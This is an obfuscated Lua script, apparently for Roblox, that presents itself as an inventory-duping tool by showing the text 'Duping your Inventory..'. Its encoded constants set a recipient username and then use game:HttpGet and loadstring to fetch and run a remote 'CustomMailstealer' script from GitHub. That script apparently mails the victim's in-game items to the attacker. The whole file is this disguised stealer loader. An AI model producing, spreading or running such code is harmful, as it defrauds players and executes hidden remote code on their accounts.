--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=0;local v84;while true do if ((0 -0)==v83) then v84=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-(620 -((1432 -(282 + 595)) + 64))) -(v32-1)) + (932 -(857 + 74)))) ;return v84-(v84%(569 -(367 + 201))) ;end end else local v85=((2566 -(1523 + 114)) -(214 + 641 + 72))^(v32-(1 -0)) ;return (((v31%(v85 + v85))>=v85) and (1 + (1065 -(68 + 997)))) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + ((2230 -(892 + 65)) -(226 + 1044)) );v19=v19 + (17 -13) ;return (v37 * (16777333 -(32 + 85))) + (v36 * (64226 + (3125 -1815))) + (v35 * (57 + 199)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if ((5 -2)~=v38) then else v45=nil;while true do local v91=1709 -(71 + 1638) ;while true do if (v91==1) then if (v39~=0) then else v40={};v41={};v42={};v43={v40,v41,nil,v42};v39=1;end break;end if (v91~=0) then else if (v39~=1) then else local v100=0;local v101;while true do if (0~=v100) then else v101=0;while true do if (v101==2) then v39=2;break;end if (v101==1) then local v170=0;while true do if (v170~=(1 + 0)) then else v101=9 -7 ;break;end if (v170~=0) then else for v184=1,v44 do local v185=0;local v186;local v187;local v188;while true do if (v185==(1 + 0)) then v188=nil;while true do if (v186~=0) then else local v196=0 + 0 ;while true do if (v196==1) then v186=1;break;end if (v196==0) then v187=v22();v188=nil;v196=2 -1 ;end end end if (v186~=(1 + 0)) then else if (v187==(1131 -(87 + 1043))) then v188=v22()~=0 ;elseif (v187==(450 -(10 + 438))) then v188=v25();elseif (v187==3) then v188=v26();end v45[v184]=v188;break;end end break;end if (v185~=0) then else v186=0 + 0 ;v187=nil;v185=3 -2 ;end end end v43[3 + 0 ]=v22();v170=1;end end end if (v101==(1180 -(1123 + 57))) then v44=v24();v45={};v101=1;end end break;end end end if (v39~=2) then else local v102=0;local v103;while true do if (v102~=(0 + 0)) then else v103=254 -(163 + 91) ;while true do if ((1930 -(1869 + 61))==v103) then for v177=1 + 0 ,v24() do local v178=0;local v179;local v180;while true do if (v178~=(3 -2)) then else while true do if (v179==(0 -0)) then v180=v22();if (v21(v180,1,1)==(0 + 0)) then local v191=0 -0 ;local v192;local v193;local v194;local v195;while true do if (v191~=(0 + 0)) then else local v198=0;while true do if (v198==(1475 -(1329 + 145))) then v191=972 -(140 + 831) ;break;end if (v198~=0) then else v192=1850 -(1409 + 441) ;v193=nil;v198=719 -(15 + 703) ;end end end if (v191==(1 + 0)) then local v199=0;while true do if (0~=v199) then else v194=nil;v195=nil;v199=439 -(262 + 176) ;end if (v199~=1) then else v191=1723 -(345 + 1376) ;break;end end end if (v191~=(690 -(198 + 490))) then else while true do if (v192~=2) then else local v200=0;while true do if (1~=v200) then else v192=13 -10 ;break;end if (v200~=(0 -0)) then else if (v21(v194,1,1)~=1) then else v195[2]=v45[v195[1208 -(696 + 510) ]];end if (v21(v194,3 -1 ,2)==1) then v195[3]=v45[v195[1265 -(1091 + 171) ]];end v200=1 + 0 ;end end end if (v192==(3 -2)) then local v201=0;local v202;while true do if (v201~=(0 -0)) then else v202=0;while true do if (v202==1) then v192=2;break;end if (v202~=(374 -(123 + 251))) then else local v211=0 -0 ;while true do if (v211~=1) then else v202=1;break;end if (v211~=(698 -(208 + 490))) then else v195={v23(),v23(),nil,nil};if (v193==(0 + 0)) then local v212=0;local v213;local v214;while true do if (v212==(837 -(660 + 176))) then while true do if (v213==0) then v214=0 + 0 ;while true do if (v214~=0) then else v195[205 -(14 + 188) ]=v23();v195[679 -(534 + 141) ]=v23();break;end end break;end end break;end if (v212~=(0 + 0)) then else v213=0;v214=nil;v212=1 + 0 ;end end elseif (v193==(1 + 0)) then v195[6 -3 ]=v24();elseif (v193==(2 -0)) then v195[3]=v24() -((5 -3)^16) ;elseif (v193~=3) then else local v217=0;local v218;while true do if (v217~=(0 + 0)) then else v218=0;while true do if (v218==(0 + 0)) then v195[399 -(115 + 281) ]=v24() -(2^16) ;v195[4]=v23();break;end end break;end end end v211=1;end end end end break;end end end if ((0 -0)==v192) then local v203=0 + 0 ;while true do if ((0 -0)~=v203) then else v193=v21(v180,2,3);v194=v21(v180,14 -10 ,6);v203=868 -(550 + 317) ;end if (v203==1) then v192=1 -0 ;break;end end end if (v192~=(3 -0)) then else if (v21(v194,3,3)==1) then v195[11 -7 ]=v45[v195[289 -(134 + 151) ]];end v40[v177]=v195;break;end end break;end end end break;end end break;end if (v178~=0) then else local v189=1665 -(970 + 695) ;local v190;while true do if (v189~=(0 -0)) then else v190=0;while true do if (v190~=(1991 -(582 + 1408))) then else v178=1;break;end if (v190~=(0 -0)) then else v179=0 -0 ;v180=nil;v190=1;end end break;end end end end end for v181=1,v24() do v41[v181-(3 -2) ]=v29();end v103=1825 -(1195 + 629) ;end if (v103~=(1 -0)) then else return v43;end end break;end end end v91=1;end end end break;end if (1~=v38) then else v41=nil;v42=nil;v38=243 -(187 + 54) ;end if ((780 -(162 + 618))~=v38) then else v39=0 + 0 ;v40=nil;v38=1 + 0 ;end if ((3 -1)~=v38) then else v43=nil;v44=nil;v38=4 -1 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=0 + 0 ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==(1637 -(1373 + 263))) then v49=1001 -(451 + (1573 -(706 + 318))) ;v50=(v21(v48,1 + 0 ,31 -11 ) * ((1253 -(721 + 530))^(53 -(1292 -(945 + 326))))) + v47 ;v46=1386 -(746 + 638) ;end if (v46==(1 + 1)) then v51=v21(v48,31 -(24 -14) ,31);v52=((v21(v48,373 -(194 + 24 + 123) )==1) and  -(1582 -(1535 + (746 -(271 + 429))))) or (1 + 0) ;v46=1 + 2 ;end if ((560 -(282 + 24 + 254))==v46) then v47=v24();v48=v24();v46=(1501 -(1408 + 92)) + 0 ;end if (v46==(5 -2)) then if (v51==(1467 -(899 + 568))) then if (v50==0) then return v52 * (0 + 0) ;else v51=2 -1 ;v49=603 -((1354 -(461 + 625)) + 335) ;end elseif (v51==(2337 -(60 + 230))) then return ((v50==(572 -(426 + 146))) and (v52 * ((1 + 0)/(1456 -(282 + 1174))))) or (v52 * NaN) ;end return v8(v52,v51-(1834 -(569 + 242)) ) * (v49 + (v50/((5 -3)^(3 + (1337 -(993 + 295)))))) ;end end end v26=nil;function v26(v53)local v54;if  not v53 then local v86=0 + 0 ;while true do if (v86==(0 + 0)) then v53=v24();if (v53==((2940 -(1749 + 20)) -(418 + 753))) then return "";end break;end end end v54=v3(v16,v19,(v19 + v53) -(1 + 0) );v19=v19 + v53 ;local v55={};for v67=1 + 0 , #v54 do v55[v67]=v2(v1(v3(v54,v67,v67)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=0 + 0 ;local v58;local v59;while true do if (v57==(1322 -((3687 -2438) + 73))) then v58,v59=v1(v16,v19,v19 + (1902 -(106 + (4857 -3063))) );v19=v19 + 1 + 1 ;v57=1 + 0 ;end if (v57==(1146 -(466 + 679))) then return (v59 * 256) + v58 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v87=v2(v0(v60,16));if v20 then local v92=0;local v93;while true do if (v92==0) then v93=v5(v87,v20);v20=nil;v92=1;end if (v92==1) then return v93;end end else return v87;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=5) then if (v82<=2) then if (v82<=0) then do return;end elseif (v82==1) then v73=v81[3];else v63[v81[3]]=v79[v81[2]];end elseif (v82<=3) then local v98=v81[2];v79[v98]=v79[v98](v13(v79,v98 + 1 ,v74));elseif (v82==4) then local v107=0;while true do if (v107==1) then v73=v73 + 1 ;v81=v69[v73];v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v107=2;end if (v107==2) then v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v107=3;end if (v107==3) then v73=v81[3];break;end if (v107==0) then v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v107=1;end end else local v108=0;local v109;local v110;local v111;local v112;local v113;while true do if (v108==6) then v73=v81[3];break;end if (v108==4) then v74=(v111 + v113) -1 ;v109=0;for v165=v113,v74 do v109=v109 + 1 ;v79[v165]=v110[v109];end v73=v73 + 1 ;v81=v69[v73];v113=v81[2];v108=5;end if (v108==2) then v81=v69[v73];v113=v81[2];v112=v79[v81[3]];v79[v113 + 1 ]=v112;v79[v113]=v112[v81[4]];v73=v73 + 1 ;v108=3;end if (v108==0) then v109=nil;v110,v111=nil;v112=nil;v113=nil;v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v108=1;end if (5==v108) then v79[v113]=v79[v113](v13(v79,v113 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];v108=6;end if (3==v108) then v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v113=v81[2];v110,v111=v72(v79[v113](v13(v79,v113 + 1 ,v81[3])));v108=4;end if (v108==1) then v81=v69[v73];if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end v73=v73 + 1 ;v81=v69[v73];if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end v73=v73 + 1 ;v108=2;end end end elseif (v82<=8) then if (v82<=6) then v79[v81[2]]();elseif (v82==7) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else local v114=0;local v115;local v116;while true do if (v114==1) then v79[v115 + 1 ]=v116;v79[v115]=v116[v81[4]];break;end if (v114==0) then v115=v81[2];v116=v79[v81[3]];v114=1;end end end elseif (v82<=10) then if (v82==9) then if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end else local v117=v81[2];local v118,v119=v72(v79[v117](v13(v79,v117 + 1 ,v81[3])));v74=(v119 + v117) -1 ;local v120=0;for v123=v117,v74 do local v124=0;while true do if (v124==0) then v120=v120 + 1 ;v79[v123]=v118[v120];break;end end end end elseif (v82==11) then for v125=v81[2],v81[3] do v79[v125]=nil;end else v79[v81[2]]=v81[3];end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F030D3O00475F4D61696C6D652O73616765031F3O005472616465207363612O6D696E67206F7468657220706C61796572733O2E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269437573746F6D2F6D61696E2F437573746F6D4D61696C737465616C657203083O00557365726E616D6503103O0067616267616267616267616232383234030F3O00475F4C6F6164696E675363722O656E03183O00447570696E6720796F757220496E76656E746F72793O2E001C3O00120C3O00014O000B000100013O0026073O0002000100010004013O0002000100120C000100013O00260700010011000100020004013O0011000100120C000200043O001205000200033O00122O000200053O00122O000300063O00202O00030003000700122O000500086O000300056O00023O00024O00020001000100044O001B000100260700010005000100010004013O0005000100120C0002000A3O001204000200093O00122O0002000C3O00122O0002000B3O00122O000100023O00044O000500010004013O001B00010004013O000200016O00017O00",v9(),...);
